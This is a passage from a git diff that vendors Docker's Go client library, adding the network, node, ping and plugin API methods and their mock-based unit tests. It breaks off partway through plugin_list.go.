+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNetworkList(t *testing.T) {
+	expectedURL := "/networks"
+
+	noDanglingFilters := filters.NewArgs()
+	noDanglingFilters.Add("dangling", "false")
+
+	danglingFilters := filters.NewArgs()
+	danglingFilters.Add("dangling", "true")
+
+	labelFilters := filters.NewArgs()
+	labelFilters.Add("label", "label1")
+	labelFilters.Add("label", "label2")
+
+	listCases := []struct {
+		options         types.NetworkListOptions
+		expectedFilters string
+	}{
+		{
+			options: types.NetworkListOptions{
+				Filters: filters.NewArgs(),
+			},
+			expectedFilters: "",
+		}, {
+			options: types.NetworkListOptions{
+				Filters: noDanglingFilters,
+			},
+			expectedFilters: `{"dangling":{"false":true}}`,
+		}, {
+			options: types.NetworkListOptions{
+				Filters: danglingFilters,
+			},
+			expectedFilters: `{"dangling":{"true":true}}`,
+		}, {
+			options: types.NetworkListOptions{
+				Filters: labelFilters,
+			},
+			expectedFilters: `{"label":{"label1":true,"label2":true}}`,
+		},
+	}
+
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				if req.Method != "GET" {
+					return nil, fmt.Errorf("expected GET method, got %s", req.Method)
+				}
+				query := req.URL.Query()
+				actualFilters := query.Get("filters")
+				if actualFilters != listCase.expectedFilters {
+					return nil, fmt.Errorf("filters not set in URL query properly. Expected '%s', got %s", listCase.expectedFilters, actualFilters)
+				}
+				content, err := json.Marshal([]types.NetworkResource{
+					{
+						Name:   "network",
+						Driver: "bridge",
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+		}
+
+		networkResources, err := client.NetworkList(context.Background(), listCase.options)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(networkResources) != 1 {
+			t.Fatalf("expected 1 network resource, got %v", networkResources)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/network_prune.go b/vendor/github.com/docker/docker/client/network_prune.go
new file mode 100644
index 0000000000..7352a7f0c5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_prune.go
@@ -0,0 +1,36 @@
+package client
+
+import (
+	"encoding/json"
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"golang.org/x/net/context"
+)
+
+// NetworksPrune requests the daemon to delete unused networks
+func (cli *Client) NetworksPrune(ctx context.Context, pruneFilters filters.Args) (types.NetworksPruneReport, error) {
+	var report types.NetworksPruneReport
+
+	if err := cli.NewVersionError("1.25", "network prune"); err != nil {
+		return report, err
+	}
+
+	query, err := getFiltersQuery(pruneFilters)
+	if err != nil {
+		return report, err
+	}
+
+	serverResp, err := cli.post(ctx, "/networks/prune", query, nil, nil)
+	if err != nil {
+		return report, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil {
+		return report, fmt.Errorf("Error retrieving network prune report: %v", err)
+	}
+
+	return report, nil
+}
diff --git a/vendor/github.com/docker/docker/client/network_remove.go b/vendor/github.com/docker/docker/client/network_remove.go
new file mode 100644
index 0000000000..6bd6748924
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_remove.go
@@ -0,0 +1,10 @@
+package client
+
+import "golang.org/x/net/context"
+
+// NetworkRemove removes an existent network from the docker host.
+func (cli *Client) NetworkRemove(ctx context.Context, networkID string) error {
+	resp, err := cli.delete(ctx, "/networks/"+networkID, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/network_remove_test.go b/vendor/github.com/docker/docker/client/network_remove_test.go
new file mode 100644
index 0000000000..2a7b9640c1
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/network_remove_test.go
@@ -0,0 +1,47 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestNetworkRemoveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.NetworkRemove(context.Background(), "network_id")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNetworkRemove(t *testing.T) {
+	expectedURL := "/networks/network_id"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "DELETE" {
+				return nil, fmt.Errorf("expected DELETE method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+			}, nil
+		}),
+	}
+
+	err := client.NetworkRemove(context.Background(), "network_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/node_inspect.go b/vendor/github.com/docker/docker/client/node_inspect.go
new file mode 100644
index 0000000000..abf505d29c
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/node_inspect.go
@@ -0,0 +1,33 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// NodeInspectWithRaw returns the node information.
+func (cli *Client) NodeInspectWithRaw(ctx context.Context, nodeID string) (swarm.Node, []byte, error) {
+	serverResp, err := cli.get(ctx, "/nodes/"+nodeID, nil, nil)
+	if err != nil {
+		if serverResp.statusCode == http.StatusNotFound {
+			return swarm.Node{}, nil, nodeNotFoundError{nodeID}
+		}
+		return swarm.Node{}, nil, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	body, err := ioutil.ReadAll(serverResp.body)
+	if err != nil {
+		return swarm.Node{}, nil, err
+	}
+
+	var response swarm.Node
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&response)
+	return response, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/node_inspect_test.go b/vendor/github.com/docker/docker/client/node_inspect_test.go
new file mode 100644
index 0000000000..fc13283084
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/node_inspect_test.go
@@ -0,0 +1,65 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestNodeInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, _, err := client.NodeInspectWithRaw(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNodeInspectNodeNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, _, err := client.NodeInspectWithRaw(context.Background(), "unknown")
+	if err == nil || !IsErrNodeNotFound(err) {
+		t.Fatalf("expected an nodeNotFoundError error, got %v", err)
+	}
+}
+
+func TestNodeInspect(t *testing.T) {
+	expectedURL := "/nodes/node_id"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal(swarm.Node{
+				ID: "node_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	nodeInspect, _, err := client.NodeInspectWithRaw(context.Background(), "node_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if nodeInspect.ID != "node_id" {
+		t.Fatalf("expected `node_id`, got %s", nodeInspect.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/node_list.go b/vendor/github.com/docker/docker/client/node_list.go
new file mode 100644
index 0000000000..3e8440f08e
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/node_list.go
@@ -0,0 +1,36 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// NodeList returns the list of nodes.
+func (cli *Client) NodeList(ctx context.Context, options types.NodeListOptions) ([]swarm.Node, error) {
+	query := url.Values{}
+
+	if options.Filters.Len() > 0 {
+		filterJSON, err := filters.ToParam(options.Filters)
+
+		if err != nil {
+			return nil, err
+		}
+
+		query.Set("filters", filterJSON)
+	}
+
+	resp, err := cli.get(ctx, "/nodes", query, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	var nodes []swarm.Node
+	err = json.NewDecoder(resp.body).Decode(&nodes)
+	ensureReaderClosed(resp)
+	return nodes, err
+}
diff --git a/vendor/github.com/docker/docker/client/node_list_test.go b/vendor/github.com/docker/docker/client/node_list_test.go
new file mode 100644
index 0000000000..0251b5cce4
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/node_list_test.go
@@ -0,0 +1,94 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestNodeListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.NodeList(context.Background(), types.NodeListOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNodeList(t *testing.T) {
+	expectedURL := "/nodes"
+
+	filters := filters.NewArgs()
+	filters.Add("label", "label1")
+	filters.Add("label", "label2")
+
+	listCases := []struct {
+		options             types.NodeListOptions
+		expectedQueryParams map[string]string
+	}{
+		{
+			options: types.NodeListOptions{},
+			expectedQueryParams: map[string]string{
+				"filters": "",
+			},
+		},
+		{
+			options: types.NodeListOptions{
+				Filters: filters,
+			},
+			expectedQueryParams: map[string]string{
+				"filters": `{"label":{"label1":true,"label2":true}}`,
+			},
+		},
+	}
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				content, err := json.Marshal([]swarm.Node{
+					{
+						ID: "node_id1",
+					},
+					{
+						ID: "node_id2",
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+		}
+
+		nodes, err := client.NodeList(context.Background(), listCase.options)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(nodes) != 2 {
+			t.Fatalf("expected 2 nodes, got %v", nodes)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/node_remove.go b/vendor/github.com/docker/docker/client/node_remove.go
new file mode 100644
index 0000000000..0a77f3d578
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/node_remove.go
@@ -0,0 +1,21 @@
+package client
+
+import (
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+
+	"golang.org/x/net/context"
+)
+
+// NodeRemove removes a Node.
+func (cli *Client) NodeRemove(ctx context.Context, nodeID string, options types.NodeRemoveOptions) error {
+	query := url.Values{}
+	if options.Force {
+		query.Set("force", "1")
+	}
+
+	resp, err := cli.delete(ctx, "/nodes/"+nodeID, query, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/node_remove_test.go b/vendor/github.com/docker/docker/client/node_remove_test.go
new file mode 100644
index 0000000000..f2f8adc4a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/node_remove_test.go
@@ -0,0 +1,69 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+
+	"golang.org/x/net/context"
+)
+
+func TestNodeRemoveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.NodeRemove(context.Background(), "node_id", types.NodeRemoveOptions{Force: false})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNodeRemove(t *testing.T) {
+	expectedURL := "/nodes/node_id"
+
+	removeCases := []struct {
+		force         bool
+		expectedForce string
+	}{
+		{
+			expectedForce: "",
+		},
+		{
+			force:         true,
+			expectedForce: "1",
+		},
+	}
+
+	for _, removeCase := range removeCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				if req.Method != "DELETE" {
+					return nil, fmt.Errorf("expected DELETE method, got %s", req.Method)
+				}
+				force := req.URL.Query().Get("force")
+				if force != removeCase.expectedForce {
+					return nil, fmt.Errorf("force not set in URL query properly. expected '%s', got %s", removeCase.expectedForce, force)
+				}
+
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+				}, nil
+			}),
+		}
+
+		err := client.NodeRemove(context.Background(), "node_id", types.NodeRemoveOptions{Force: removeCase.force})
+		if err != nil {
+			t.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/node_update.go b/vendor/github.com/docker/docker/client/node_update.go
new file mode 100644
index 0000000000..3ca9760282
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/node_update.go
@@ -0,0 +1,18 @@
+package client
+
+import (
+	"net/url"
+	"strconv"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// NodeUpdate updates a Node.
+func (cli *Client) NodeUpdate(ctx context.Context, nodeID string, version swarm.Version, node swarm.NodeSpec) error {
+	query := url.Values{}
+	query.Set("version", strconv.FormatUint(version.Index, 10))
+	resp, err := cli.post(ctx, "/nodes/"+nodeID+"/update", query, node, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/node_update_test.go b/vendor/github.com/docker/docker/client/node_update_test.go
new file mode 100644
index 0000000000..613ff104eb
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/node_update_test.go
@@ -0,0 +1,49 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/swarm"
+)
+
+func TestNodeUpdateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.NodeUpdate(context.Background(), "node_id", swarm.Version{}, swarm.NodeSpec{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestNodeUpdate(t *testing.T) {
+	expectedURL := "/nodes/node_id/update"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+			}, nil
+		}),
+	}
+
+	err := client.NodeUpdate(context.Background(), "node_id", swarm.Version{}, swarm.NodeSpec{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/ping.go b/vendor/github.com/docker/docker/client/ping.go
new file mode 100644
index 0000000000..22dcda24fd
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/ping.go
@@ -0,0 +1,30 @@
+package client
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// Ping pings the server and return the value of the "Docker-Experimental" & "API-Version" headers
+func (cli *Client) Ping(ctx context.Context) (types.Ping, error) {
+	var ping types.Ping
+	req, err := cli.buildRequest("GET", fmt.Sprintf("%s/_ping", cli.basePath), nil, nil)
+	if err != nil {
+		return ping, err
+	}
+	serverResp, err := cli.doRequest(ctx, req)
+	if err != nil {
+		return ping, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	ping.APIVersion = serverResp.header.Get("API-Version")
+
+	if serverResp.header.Get("Docker-Experimental") == "true" {
+		ping.Experimental = true
+	}
+
+	return ping, nil
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_create.go b/vendor/github.com/docker/docker/client/plugin_create.go
new file mode 100644
index 0000000000..a660ba5733
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_create.go
@@ -0,0 +1,26 @@
+package client
+
+import (
+	"io"
+	"net/http"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// PluginCreate creates a plugin
+func (cli *Client) PluginCreate(ctx context.Context, createContext io.Reader, createOptions types.PluginCreateOptions) error {
+	headers := http.Header(make(map[string][]string))
+	headers.Set("Content-Type", "application/tar")
+
+	query := url.Values{}
+	query.Set("name", createOptions.RepoName)
+
+	resp, err := cli.postRaw(ctx, "/plugins/create", query, createContext, headers)
+	if err != nil {
+		return err
+	}
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_disable.go b/vendor/github.com/docker/docker/client/plugin_disable.go
new file mode 100644
index 0000000000..30467db742
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_disable.go
@@ -0,0 +1,19 @@
+package client
+
+import (
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// PluginDisable disables a plugin
+func (cli *Client) PluginDisable(ctx context.Context, name string, options types.PluginDisableOptions) error {
+	query := url.Values{}
+	if options.Force {
+		query.Set("force", "1")
+	}
+	resp, err := cli.post(ctx, "/plugins/"+name+"/disable", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_disable_test.go b/vendor/github.com/docker/docker/client/plugin_disable_test.go
new file mode 100644
index 0000000000..a4de45be2d
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_disable_test.go
@@ -0,0 +1,48 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestPluginDisableError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.PluginDisable(context.Background(), "plugin_name", types.PluginDisableOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestPluginDisable(t *testing.T) {
+	expectedURL := "/plugins/plugin_name/disable"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.PluginDisable(context.Background(), "plugin_name", types.PluginDisableOptions{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_enable.go b/vendor/github.com/docker/docker/client/plugin_enable.go
new file mode 100644
index 0000000000..95517c4b80
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_enable.go
@@ -0,0 +1,19 @@
+package client
+
+import (
+	"net/url"
+	"strconv"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// PluginEnable enables a plugin
+func (cli *Client) PluginEnable(ctx context.Context, name string, options types.PluginEnableOptions) error {
+	query := url.Values{}
+	query.Set("timeout", strconv.Itoa(options.Timeout))
+
+	resp, err := cli.post(ctx, "/plugins/"+name+"/enable", query, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_enable_test.go b/vendor/github.com/docker/docker/client/plugin_enable_test.go
new file mode 100644
index 0000000000..b27681348f
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_enable_test.go
@@ -0,0 +1,48 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestPluginEnableError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.PluginEnable(context.Background(), "plugin_name", types.PluginEnableOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestPluginEnable(t *testing.T) {
+	expectedURL := "/plugins/plugin_name/enable"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
+			}, nil
+		}),
+	}
+
+	err := client.PluginEnable(context.Background(), "plugin_name", types.PluginEnableOptions{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_inspect.go b/vendor/github.com/docker/docker/client/plugin_inspect.go
new file mode 100644
index 0000000000..89f39ee2c6
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_inspect.go
@@ -0,0 +1,32 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// PluginInspectWithRaw inspects an existing plugin
+func (cli *Client) PluginInspectWithRaw(ctx context.Context, name string) (*types.Plugin, []byte, error) {
+	resp, err := cli.get(ctx, "/plugins/"+name+"/json", nil, nil)
+	if err != nil {
+		if resp.statusCode == http.StatusNotFound {
+			return nil, nil, pluginNotFoundError{name}
+		}
+		return nil, nil, err
+	}
+
+	defer ensureReaderClosed(resp)
+	body, err := ioutil.ReadAll(resp.body)
+	if err != nil {
+		return nil, nil, err
+	}
+	var p types.Plugin
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&p)
+	return &p, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_inspect_test.go b/vendor/github.com/docker/docker/client/plugin_inspect_test.go
new file mode 100644
index 0000000000..fae407eb9b
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_inspect_test.go
@@ -0,0 +1,54 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+func TestPluginInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, _, err := client.PluginInspectWithRaw(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestPluginInspect(t *testing.T) {
+	expectedURL := "/plugins/plugin_name"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal(types.Plugin{
+				ID: "plugin_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	pluginInspect, _, err := client.PluginInspectWithRaw(context.Background(), "plugin_name")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if pluginInspect.ID != "plugin_id" {
+		t.Fatalf("expected `plugin_id`, got %s", pluginInspect.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_install.go b/vendor/github.com/docker/docker/client/plugin_install.go
new file mode 100644
index 0000000000..3217c4cf39
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_install.go
@@ -0,0 +1,113 @@
+package client
+
+import (
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/url"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+)
+
+// PluginInstall installs a plugin
+func (cli *Client) PluginInstall(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) {
+	query := url.Values{}
+	if _, err := reference.ParseNamed(options.RemoteRef); err != nil {
+		return nil, errors.Wrap(err, "invalid remote reference")
+	}
+	query.Set("remote", options.RemoteRef)
+
+	privileges, err := cli.checkPluginPermissions(ctx, query, options)
+	if err != nil {
+		return nil, err
+	}
+
+	// set name for plugin pull, if empty should default to remote reference
+	query.Set("name", name)
+
+	resp, err := cli.tryPluginPull(ctx, query, privileges, options.RegistryAuth)
+	if err != nil {
+		return nil, err
+	}
+
+	name = resp.header.Get("Docker-Plugin-Name")
+
+	pr, pw := io.Pipe()
+	go func() { // todo: the client should probably be designed more around the actual api
+		_, err := io.Copy(pw, resp.body)
+		if err != nil {
+			pw.CloseWithError(err)
+			return
+		}
+		defer func() {
+			if err != nil {
+				delResp, _ := cli.delete(ctx, "/plugins/"+name, nil, nil)
+				ensureReaderClosed(delResp)
+			}
+		}()
+		if len(options.Args) > 0 {
+			if err := cli.PluginSet(ctx, name, options.Args); err != nil {
+				pw.CloseWithError(err)
+				return
+			}
+		}
+
+		if options.Disabled {
+			pw.Close()
+			return
+		}
+
+		err = cli.PluginEnable(ctx, name, types.PluginEnableOptions{Timeout: 0})
+		pw.CloseWithError(err)
+	}()
+	return pr, nil
+}
+
+func (cli *Client) tryPluginPrivileges(ctx context.Context, query url.Values, registryAuth string) (serverResponse, error) {
+	headers := map[string][]string{"X-Registry-Auth": {registryAuth}}
+	return cli.get(ctx, "/plugins/privileges", query, headers)
+}
+
+func (cli *Client) tryPluginPull(ctx context.Context, query url.Values, privileges types.PluginPrivileges, registryAuth string) (serverResponse, error) {
+	headers := map[string][]string{"X-Registry-Auth": {registryAuth}}
+	return cli.post(ctx, "/plugins/pull", query, privileges, headers)
+}
+
+func (cli *Client) checkPluginPermissions(ctx context.Context, query url.Values, options types.PluginInstallOptions) (types.PluginPrivileges, error) {
+	resp, err := cli.tryPluginPrivileges(ctx, query, options.RegistryAuth)
+	if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil {
+		// todo: do inspect before to check existing name before checking privileges
+		newAuthHeader, privilegeErr := options.PrivilegeFunc()
+		if privilegeErr != nil {
+			ensureReaderClosed(resp)
+			return nil, privilegeErr
+		}
+		options.RegistryAuth = newAuthHeader
+		resp, err = cli.tryPluginPrivileges(ctx, query, options.RegistryAuth)
+	}
+	if err != nil {
+		ensureReaderClosed(resp)
+		return nil, err
+	}
+
+	var privileges types.PluginPrivileges
+	if err := json.NewDecoder(resp.body).Decode(&privileges); err != nil {
+		ensureReaderClosed(resp)
+		return nil, err
+	}
+	ensureReaderClosed(resp)
+
+	if !options.AcceptAllPermissions && options.AcceptPermissionsFunc != nil && len(privileges) > 0 {
+		accept, err := options.AcceptPermissionsFunc(privileges)
+		if err != nil {
+			return nil, err
+		}
+		if !accept {
+			return nil, pluginPermissionDenied{options.RemoteRef}
+		}
+	}
+	return privileges, nil
+}
diff --git a/vendor/github.com/docker/docker/client/plugin_list.go b/vendor/github.com/docker/docker/client/plugin_list.go
new file mode 100644
index 0000000000..88c480a3e1
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/plugin_list.go
@@ -0,0 +1,21 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// PluginList returns the installed plugins
+func (cli *Client) PluginList(ctx context.Context) (types.PluginsListResponse, error) {
+	var plugins types.PluginsListResponse
